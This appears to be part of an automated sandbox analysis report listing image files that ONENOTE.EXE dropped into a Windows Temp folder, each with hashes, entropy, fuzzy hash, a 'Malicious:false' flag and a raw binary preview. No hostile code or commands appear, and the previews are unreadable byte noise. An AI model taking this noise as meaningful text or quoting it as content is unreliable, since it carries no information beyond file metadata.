                                                                                                                                                                                                                  Preview:.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{140BAB7D-53EC-41C9-8E67-8E12BF2ED0CF}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{142F369A-8682-4CA6-95DF-18E5E8472E22}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{1543F5E0-4EF2-4572-826D-A2E2F7AE9A31}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):34299
                                                                                                                                                                                                                  Entropy (8bit):7.247541176493898
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
                                                                                                                                                                                                                  MD5:E9C52A7381075E4EBC59296F96C79399
                                                                                                                                                                                                                  SHA1:BE295AD24D46E2420D7163642B658BF3234A27EA
                                                                                                                                                                                                                  SHA-256:D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
                                                                                                                                                                                                                  SHA-512:95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q|..'.;\..6..v......e...../.k..|.8..i..|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L|.'5...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{173EB255-A222-4DAC-9D57-C79353CA4DA3}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{17660AE9-88B3-495E-A0E0-4D92BF6B5BCD}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{1815151C-1C87-412C-8575-38E092814770}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{1868016D-840E-4295-A8CB-C2F972BA1A7B}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{195884F3-1C9A-49FC-A821-8A8C45C72141}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{19E4E844-6A99-492C-8E31-ED6091AD3084}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):179460
                                                                                                                                                                                                                  Entropy (8bit):7.979020171518325
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
                                                                                                                                                                                                                  MD5:4E131DBFEC5C2462273CA7B35675B9D9
                                                                                                                                                                                                                  SHA1:CA037F444D819A118AC37D7AA3782B9BF94C1616
                                                                                                                                                                                                                  SHA-256:2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
                                                                                                                                                                                                                  SHA-512:C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k......*......#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,*x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{1A0909DE-ABAA-490C-B71F-B29C27B6FA35}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{1A595306-DA15-4F29-8C1F-5FD03AB438F7}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{1D331634-6AB7-4CD9-9B2C-C1190A0CABA6}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
